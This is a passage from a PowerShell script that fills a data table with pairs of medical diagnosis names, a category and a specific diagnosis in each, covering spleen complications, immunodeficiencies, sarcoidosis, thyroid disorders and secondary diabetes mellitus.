$DiagnosisList.Rows.Add("Postprocedural hemorrhage of the spleen following a procedure","Postprocedural hemorrhage of the spleen following a procedure on the spleen") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of the spleen following a procedure","Postprocedural hemorrhage of the spleen following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of the spleen following a procedure","Postprocedural hematoma of the spleen following a procedure on the spleen") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of the spleen following a procedure","Postprocedural hematoma of the spleen following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of the spleen following a procedure","Postprocedural seroma of the spleen following a procedure on the spleen") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of the spleen following a procedure","Postprocedural seroma of the spleen following other procedure") + $null = $DiagnosisList.Rows.Add("Other intraoperative and postprocedural complications of the spleen","Other intraoperative complications of the spleen") + $null = $DiagnosisList.Rows.Add("Other intraoperative and postprocedural complications of the spleen","Other postprocedural complications of the spleen") + $null = $DiagnosisList.Rows.Add("Immunodeficiency with predominantly antibody defects","Hereditary hypogammaglobulinemia") + $null = $DiagnosisList.Rows.Add("Immunodeficiency with predominantly antibody defects","Nonfamilial hypogammaglobulinemia") + $null = $DiagnosisList.Rows.Add("Immunodeficiency with predominantly antibody defects","Selective deficiency of immunoglobulin A [IgA]") + $null = $DiagnosisList.Rows.Add("Immunodeficiency with predominantly antibody defects","Selective deficiency of immunoglobulin G [IgG] subclasses") + $null = $DiagnosisList.Rows.Add("Immunodeficiency with predominantly antibody defects","Selective deficiency of immunoglobulin M [IgM]") + $null = $DiagnosisList.Rows.Add("Immunodeficiency with predominantly antibody defects","Immunodeficiency with increased immunoglobulin M [IgM]") + $null = $DiagnosisList.Rows.Add("Immunodeficiency with predominantly antibody defects","Antibody deficiency with near-normal immunoglobulins or with hyperimmunoglobulinemia") + $null = $DiagnosisList.Rows.Add("Immunodeficiency with predominantly antibody defects","Transient hypogammaglobulinemia of infancy") + $null = $DiagnosisList.Rows.Add("Immunodeficiency with predominantly antibody defects","Other immunodeficiencies with predominantly antibody defects") + $null = $DiagnosisList.Rows.Add("Immunodeficiency with predominantly antibody defects","Immunodeficiency with predominantly antibody defects, unspecified") + $null = $DiagnosisList.Rows.Add("Combined immunodeficiencies","Severe combined immunodeficiency [SCID] with reticular dysgenesis") + $null = $DiagnosisList.Rows.Add("Combined immunodeficiencies","Severe combined immunodeficiency [SCID] with low T- and B-cell numbers") + $null = $DiagnosisList.Rows.Add("Combined immunodeficiencies","Severe combined immunodeficiency [SCID] with low or normal B-cell numbers") + $null = $DiagnosisList.Rows.Add("Combined immunodeficiencies","Adenosine deaminase [ADA] deficiency") + $null = $DiagnosisList.Rows.Add("Combined immunodeficiencies","Nezelof's syndrome") + $null = $DiagnosisList.Rows.Add("Combined immunodeficiencies","Purine nucleoside phosphorylase [PNP] deficiency") + $null = $DiagnosisList.Rows.Add("Combined immunodeficiencies","Major histocompatibility complex class I deficiency") + $null = $DiagnosisList.Rows.Add("Combined immunodeficiencies","Major histocompatibility complex class II deficiency") + $null = $DiagnosisList.Rows.Add("Biotin-dependent carboxylase deficiency","Biotinidase deficiency") + $null = $DiagnosisList.Rows.Add("Biotin-dependent carboxylase deficiency","Other biotin-dependent carboxylase deficiency") + $null = $DiagnosisList.Rows.Add("Biotin-dependent carboxylase deficiency","Biotin-dependent carboxylase deficiency, unspecified") + $null = $DiagnosisList.Rows.Add("Other combined immunodeficiencies","Other combined immunodeficiencies") + $null = $DiagnosisList.Rows.Add("Combined immunodeficiency, unspecified","Combined immunodeficiency, unspecified") + $null = $DiagnosisList.Rows.Add("Immunodeficiency associated with other major defects","Wiskott-Aldrich syndrome") + $null = $DiagnosisList.Rows.Add("Immunodeficiency associated with other major defects","Di George's syndrome") + $null = $DiagnosisList.Rows.Add("Immunodeficiency associated with other major defects","Immunodeficiency with short-limbed stature") + $null = $DiagnosisList.Rows.Add("Immunodeficiency associated with other major defects","Immunodeficiency following hereditary defective response to Epstein-Barr virus") + $null = $DiagnosisList.Rows.Add("Immunodeficiency associated with other major defects","Hyperimmunoglobulin E [IgE] syndrome") + $null = $DiagnosisList.Rows.Add("Immunodeficiency associated with other major defects","Immunodeficiency associated with other specified major defects") + $null = $DiagnosisList.Rows.Add("Immunodeficiency associated with other major defects","Immunodeficiency associated with major defect, unspecified") + $null = $DiagnosisList.Rows.Add("Common variable immunodeficiency","Common variable immunodeficiency with predominant abnormalities of B-cell numbers and function") + $null = $DiagnosisList.Rows.Add("Common variable immunodeficiency","Common variable immunodeficiency with predominant immunoregulatory T-cell disorders") + $null = $DiagnosisList.Rows.Add("Common variable immunodeficiency","Common variable immunodeficiency with autoantibodies to B- or T-cells") + $null = $DiagnosisList.Rows.Add("Common variable immunodeficiency","Other common variable immunodeficiencies") + $null = $DiagnosisList.Rows.Add("Common variable immunodeficiency","Common variable immunodeficiency, unspecified") + $null = $DiagnosisList.Rows.Add("Other immunodeficiencies","Lymphocyte function antigen-1 [LFA-1] defect") + $null = $DiagnosisList.Rows.Add("Other immunodeficiencies","Defects in the complement system") + $null = $DiagnosisList.Rows.Add("Other immunodeficiencies","Other specified immunodeficiencies") + $null = $DiagnosisList.Rows.Add("Other immunodeficiencies","Immunodeficiency, unspecified") + $null = $DiagnosisList.Rows.Add("Sarcoidosis","Sarcoidosis of lung") + $null = $DiagnosisList.Rows.Add("Sarcoidosis","Sarcoidosis of lymph nodes") + $null = $DiagnosisList.Rows.Add("Sarcoidosis","Sarcoidosis of lung with sarcoidosis of lymph nodes") + $null = $DiagnosisList.Rows.Add("Sarcoidosis","Sarcoidosis of skin") + $null = $DiagnosisList.Rows.Add("Sarcoidosis of other sites","Sarcoid meningitis") + $null = $DiagnosisList.Rows.Add("Sarcoidosis of other sites","Multiple cranial nerve palsies in sarcoidosis") + $null = $DiagnosisList.Rows.Add("Sarcoidosis of other sites","Sarcoid iridocyclitis") + $null = $DiagnosisList.Rows.Add("Sarcoidosis of other sites","Sarcoid pyelonephritis") + $null = $DiagnosisList.Rows.Add("Sarcoidosis of other sites","Sarcoid myocarditis") + $null = $DiagnosisList.Rows.Add("Sarcoidosis of other sites","Sarcoid arthropathy") + $null = $DiagnosisList.Rows.Add("Sarcoidosis of other sites","Sarcoid myositis") + $null = $DiagnosisList.Rows.Add("Sarcoidosis of other sites","Sarcoidosis of other sites") + $null = $DiagnosisList.Rows.Add("Sarcoidosis, unspecified","Sarcoidosis, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders involving the immune mechanism, not elsewhere classified","Polyclonal hypergammaglobulinemia") + $null = $DiagnosisList.Rows.Add("Other disorders involving the immune mechanism, not elsewhere classified","Cryoglobulinemia") + $null = $DiagnosisList.Rows.Add("Other disorders involving the immune mechanism, not elsewhere classified","Hypergammaglobulinemia, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders involving the immune mechanism, not elsewhere classified","Immune reconstitution syndrome") + $null = $DiagnosisList.Rows.Add("Mast cell activation syndrome and related disorders","Mast cell activation, unspecified") + $null = $DiagnosisList.Rows.Add("Mast cell activation syndrome and related disorders","Monoclonal mast cell activation syndrome") + $null = $DiagnosisList.Rows.Add("Mast cell activation syndrome and related disorders","Idiopathic mast cell activation syndrome") + $null = $DiagnosisList.Rows.Add("Mast cell activation syndrome and related disorders","Secondary mast cell activation") + $null = $DiagnosisList.Rows.Add("Mast cell activation syndrome and related disorders","Other mast cell activation disorder") + $null = $DiagnosisList.Rows.Add("Graft-versus-host disease","Acute graft-versus-host disease") + $null = $DiagnosisList.Rows.Add("Graft-versus-host disease","Chronic graft-versus-host disease") + $null = $DiagnosisList.Rows.Add("Graft-versus-host disease","Acute on chronic graft-versus-host disease") + $null = $DiagnosisList.Rows.Add("Graft-versus-host disease","Graft-versus-host disease, unspecified") + $null = $DiagnosisList.Rows.Add("Autoimmune lymphoproliferative syndrome [ALPS]","Autoimmune lymphoproliferative syndrome [ALPS]") + $null = $DiagnosisList.Rows.Add("Other specified disorders involving the immune mechanism, not elsewhere classified","Other specified disorders involving the immune mechanism, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Disorder involving the immune mechanism, unspecified","Disorder involving the immune mechanism, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital iodine-deficiency syndrome","Congenital iodine-deficiency syndrome, neurological type") + $null = $DiagnosisList.Rows.Add("Congenital iodine-deficiency syndrome","Congenital iodine-deficiency syndrome, myxedematous type") + $null = $DiagnosisList.Rows.Add("Congenital iodine-deficiency syndrome","Congenital iodine-deficiency syndrome, mixed type") + $null = $DiagnosisList.Rows.Add("Congenital iodine-deficiency syndrome","Congenital iodine-deficiency syndrome, unspecified") + $null = $DiagnosisList.Rows.Add("Iodine-deficiency related thyroid disorders and allied conditions","Iodine-deficiency related diffuse (endemic) goiter") + $null = $DiagnosisList.Rows.Add("Iodine-deficiency related thyroid disorders and allied conditions","Iodine-deficiency related multinodular (endemic) goiter") + $null = $DiagnosisList.Rows.Add("Iodine-deficiency related thyroid disorders and allied conditions","Iodine-deficiency related (endemic) goiter, unspecified") + $null = $DiagnosisList.Rows.Add("Iodine-deficiency related thyroid disorders and allied conditions","Other iodine-deficiency related thyroid disorders and allied conditions") + $null = $DiagnosisList.Rows.Add("Subclinical iodine-deficiency hypothyroidism","Subclinical iodine-deficiency hypothyroidism") + $null = $DiagnosisList.Rows.Add("Other hypothyroidism","Congenital hypothyroidism with diffuse goiter") + $null = $DiagnosisList.Rows.Add("Other hypothyroidism","Congenital hypothyroidism without goiter") + $null = $DiagnosisList.Rows.Add("Other hypothyroidism","Hypothyroidism due to medicaments and other exogenous substances") + $null = $DiagnosisList.Rows.Add("Other hypothyroidism","Postinfectious hypothyroidism") + $null = $DiagnosisList.Rows.Add("Other hypothyroidism","Atrophy of thyroid (acquired)") + $null = $DiagnosisList.Rows.Add("Other hypothyroidism","Myxedema coma") + $null = $DiagnosisList.Rows.Add("Other hypothyroidism","Other specified hypothyroidism") + $null = $DiagnosisList.Rows.Add("Other hypothyroidism","Hypothyroidism, unspecified") + $null = $DiagnosisList.Rows.Add("Other nontoxic goiter","Nontoxic diffuse goiter") + $null = $DiagnosisList.Rows.Add("Other nontoxic goiter","Nontoxic single thyroid nodule") + $null = $DiagnosisList.Rows.Add("Other nontoxic goiter","Nontoxic multinodular goiter") + $null = $DiagnosisList.Rows.Add("Other nontoxic goiter","Other specified nontoxic goiter") + $null = $DiagnosisList.Rows.Add("Other nontoxic goiter","Nontoxic goiter, unspecified") + $null = $DiagnosisList.Rows.Add("Thyrotoxicosis with diffuse goiter","Thyrotoxicosis with diffuse goiter without thyrotoxic crisis or storm") + $null = $DiagnosisList.Rows.Add("Thyrotoxicosis with diffuse goiter","Thyrotoxicosis with diffuse goiter with thyrotoxic crisis or storm") + $null = $DiagnosisList.Rows.Add("Thyrotoxicosis with toxic single thyroid nodule","Thyrotoxicosis with toxic single thyroid nodule without thyrotoxic crisis or storm") + $null = $DiagnosisList.Rows.Add("Thyrotoxicosis with toxic single thyroid nodule","Thyrotoxicosis with toxic single thyroid nodule with thyrotoxic crisis or storm") + $null = $DiagnosisList.Rows.Add("Thyrotoxicosis with toxic multinodular goiter","Thyrotoxicosis with toxic multinodular goiter without thyrotoxic crisis or storm") + $null = $DiagnosisList.Rows.Add("Thyrotoxicosis with toxic multinodular goiter","Thyrotoxicosis with toxic multinodular goiter with thyrotoxic crisis or storm") + $null = $DiagnosisList.Rows.Add("Thyrotoxicosis from ectopic thyroid tissue","Thyrotoxicosis from ectopic thyroid tissue without thyrotoxic crisis or storm") + $null = $DiagnosisList.Rows.Add("Thyrotoxicosis from ectopic thyroid tissue","Thyrotoxicosis from ectopic thyroid tissue with thyrotoxic crisis or storm") + $null = $DiagnosisList.Rows.Add("Thyrotoxicosis factitia","Thyrotoxicosis factitia without thyrotoxic crisis or storm") + $null = $DiagnosisList.Rows.Add("Thyrotoxicosis factitia","Thyrotoxicosis factitia with thyrotoxic crisis or storm") + $null = $DiagnosisList.Rows.Add("Other thyrotoxicosis","Other thyrotoxicosis without thyrotoxic crisis or storm") + $null = $DiagnosisList.Rows.Add("Other thyrotoxicosis","Other thyrotoxicosis with thyrotoxic crisis or storm") + $null = $DiagnosisList.Rows.Add("Thyrotoxicosis, unspecified","Thyrotoxicosis, unspecified without thyrotoxic crisis or storm") + $null = $DiagnosisList.Rows.Add("Thyrotoxicosis, unspecified","Thyrotoxicosis, unspecified with thyrotoxic crisis or storm") + $null = $DiagnosisList.Rows.Add("Thyroiditis","Acute thyroiditis") + $null = $DiagnosisList.Rows.Add("Thyroiditis","Subacute thyroiditis") + $null = $DiagnosisList.Rows.Add("Thyroiditis","Chronic thyroiditis with transient thyrotoxicosis") + $null = $DiagnosisList.Rows.Add("Thyroiditis","Autoimmune thyroiditis") + $null = $DiagnosisList.Rows.Add("Thyroiditis","Drug-induced thyroiditis") + $null = $DiagnosisList.Rows.Add("Thyroiditis","Other chronic thyroiditis") + $null = $DiagnosisList.Rows.Add("Thyroiditis","Thyroiditis, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of thyroid","Hypersecretion of calcitonin") + $null = $DiagnosisList.Rows.Add("Other disorders of thyroid","Dyshormogenetic goiter") + $null = $DiagnosisList.Rows.Add("Other specified disorders of thyroid","Sick-euthyroid syndrome") + $null = $DiagnosisList.Rows.Add("Other specified disorders of thyroid","Other specified disorders of thyroid") + $null = $DiagnosisList.Rows.Add("Disorder of thyroid, unspecified","Disorder of thyroid, unspecified") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with hyperosmolarity","Diabetes mellitus due to underlying condition with hyperosmolarity without nonketotic hyperglycemic-hyperosmolar coma (NKHHC)") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with hyperosmolarity","Diabetes mellitus due to underlying condition with hyperosmolarity with coma") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with ketoacidosis","Diabetes mellitus due to underlying condition with ketoacidosis without coma") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with ketoacidosis","Diabetes mellitus due to underlying condition with ketoacidosis with coma") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with kidney complications","Diabetes mellitus due to underlying condition with diabetic nephropathy") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with kidney complications","Diabetes mellitus due to underlying condition with diabetic chronic kidney disease") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with kidney complications","Diabetes mellitus due to underlying condition with other diabetic kidney complication") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with unspecified diabetic retinopathy","Diabetes mellitus due to underlying condition with unspecified diabetic retinopathy with macular edema") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with unspecified diabetic retinopathy","Diabetes mellitus due to underlying condition with unspecified diabetic retinopathy without macular edema") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with mild nonproliferative diabetic retinopathy with macular edema","Diabetes mellitus due to underlying condition with mild nonproliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with mild nonproliferative diabetic retinopathy with macular edema","Diabetes mellitus due to underlying condition with mild nonproliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with mild nonproliferative diabetic retinopathy with macular edema","Diabetes mellitus due to underlying condition with mild nonproliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with mild nonproliferative diabetic retinopathy with macular edema","Diabetes mellitus due to underlying condition with mild nonproliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with mild nonproliferative diabetic retinopathy without macular edema","Diabetes mellitus due to underlying condition with mild nonproliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with mild nonproliferative diabetic retinopathy without macular edema","Diabetes mellitus due to underlying condition with mild nonproliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with mild nonproliferative diabetic retinopathy without macular edema","Diabetes mellitus due to underlying condition with mild nonproliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with mild nonproliferative diabetic retinopathy without macular edema","Diabetes mellitus due to underlying condition with mild nonproliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with moderate nonproliferative diabetic retinopathy with macular edema","Diabetes mellitus due to underlying condition with moderate nonproliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with moderate nonproliferative diabetic retinopathy with macular edema","Diabetes mellitus due to underlying condition with moderate nonproliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with moderate nonproliferative diabetic retinopathy with macular edema","Diabetes mellitus due to underlying condition with moderate nonproliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with moderate nonproliferative diabetic retinopathy with macular edema","Diabetes mellitus due to underlying condition with moderate nonproliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with moderate nonproliferative diabetic retinopathy without macular edema","Diabetes mellitus due to underlying condition with moderate nonproliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with moderate nonproliferative diabetic retinopathy without macular edema","Diabetes mellitus due to underlying condition with moderate nonproliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with moderate nonproliferative diabetic retinopathy without macular edema","Diabetes mellitus due to underlying condition with moderate nonproliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with moderate nonproliferative diabetic retinopathy without macular edema","Diabetes mellitus due to underlying condition with moderate nonproliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with severe nonproliferative diabetic retinopathy with macular edema","Diabetes mellitus due to underlying condition with severe nonproliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with severe nonproliferative diabetic retinopathy with macular edema","Diabetes mellitus due to underlying condition with severe nonproliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with severe nonproliferative diabetic retinopathy with macular edema","Diabetes mellitus due to underlying condition with severe nonproliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with severe nonproliferative diabetic retinopathy with macular edema","Diabetes mellitus due to underlying condition with severe nonproliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with severe nonproliferative diabetic retinopathy without macular edema","Diabetes mellitus due to underlying condition with severe nonproliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with severe nonproliferative diabetic retinopathy without macular edema","Diabetes mellitus due to underlying condition with severe nonproliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with severe nonproliferative diabetic retinopathy without macular edema","Diabetes mellitus due to underlying condition with severe nonproliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with severe nonproliferative diabetic retinopathy without macular edema","Diabetes mellitus due to underlying condition with severe nonproliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with macular edema","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with macular edema","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with macular edema","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with macular edema","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with traction retinal detachment involving the macula, right eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with traction retinal detachment involving the macula, left eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with traction retinal detachment involving the macula, bilateral") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with traction retinal detachment involving the macula, unspecified eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, right eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, left eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, bilateral") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, unspecified eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, right eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, left eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, bilateral") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with stable proliferative diabetic retinopathy","Diabetes mellitus due to underlying condition with stable proliferative diabetic retinopathy, right eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with stable proliferative diabetic retinopathy","Diabetes mellitus due to underlying condition with stable proliferative diabetic retinopathy, left eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with stable proliferative diabetic retinopathy","Diabetes mellitus due to underlying condition with stable proliferative diabetic retinopathy, bilateral") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with stable proliferative diabetic retinopathy","Diabetes mellitus due to underlying condition with stable proliferative diabetic retinopathy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy without macular edema","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy without macular edema","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy without macular edema","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy without macular edema","Diabetes mellitus due to underlying condition with proliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with diabetic cataract","Diabetes mellitus due to underlying condition with diabetic cataract") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with diabetic macular edema, resolved following treatment","Diabetes mellitus due to underlying condition with diabetic macular edema, resolved following treatment, right eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with diabetic macular edema, resolved following treatment","Diabetes mellitus due to underlying condition with diabetic macular edema, resolved following treatment, left eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with diabetic macular edema, resolved following treatment","Diabetes mellitus due to underlying condition with diabetic macular edema, resolved following treatment, bilateral") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with diabetic macular edema, resolved following treatment","Diabetes mellitus due to underlying condition with diabetic macular edema, resolved following treatment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with other diabetic ophthalmic complication","Diabetes mellitus due to underlying condition with other diabetic ophthalmic complication") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with neurological complications","Diabetes mellitus due to underlying condition with diabetic neuropathy, unspecified") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with neurological complications","Diabetes mellitus due to underlying condition with diabetic mononeuropathy") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with neurological complications","Diabetes mellitus due to underlying condition with diabetic polyneuropathy") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with neurological complications","Diabetes mellitus due to underlying condition with diabetic autonomic (poly)neuropathy") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with neurological complications","Diabetes mellitus due to underlying condition with diabetic amyotrophy") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with neurological complications","Diabetes mellitus due to underlying condition with other diabetic neurological complication") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with circulatory complications","Diabetes mellitus due to underlying condition with diabetic peripheral angiopathy without gangrene") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with circulatory complications","Diabetes mellitus due to underlying condition with diabetic peripheral angiopathy with gangrene") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with circulatory complications","Diabetes mellitus due to underlying condition with other circulatory complications") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with diabetic arthropathy","Diabetes mellitus due to underlying condition with diabetic neuropathic arthropathy") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with diabetic arthropathy","Diabetes mellitus due to underlying condition with other diabetic arthropathy") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with skin complications","Diabetes mellitus due to underlying condition with diabetic dermatitis") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with skin complications","Diabetes mellitus due to underlying condition with foot ulcer") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with skin complications","Diabetes mellitus due to underlying condition with other skin ulcer") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with skin complications","Diabetes mellitus due to underlying condition with other skin complications") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with oral complications","Diabetes mellitus due to underlying condition with periodontal disease") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with oral complications","Diabetes mellitus due to underlying condition with other oral complications") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with hypoglycemia","Diabetes mellitus due to underlying condition with hypoglycemia with coma") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with hypoglycemia","Diabetes mellitus due to underlying condition with hypoglycemia without coma") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with hyperglycemia","Diabetes mellitus due to underlying condition with hyperglycemia") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with other specified complication","Diabetes mellitus due to underlying condition with other specified complication") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition with unspecified complications","Diabetes mellitus due to underlying condition with unspecified complications") + $null = $DiagnosisList.Rows.Add("Diabetes mellitus due to underlying condition without complications","Diabetes mellitus due to underlying condition without complications") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with hyperosmolarity","Drug or chemical induced diabetes mellitus with hyperosmolarity without nonketotic hyperglycemic-hyperosmolar coma (NKHHC)") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes 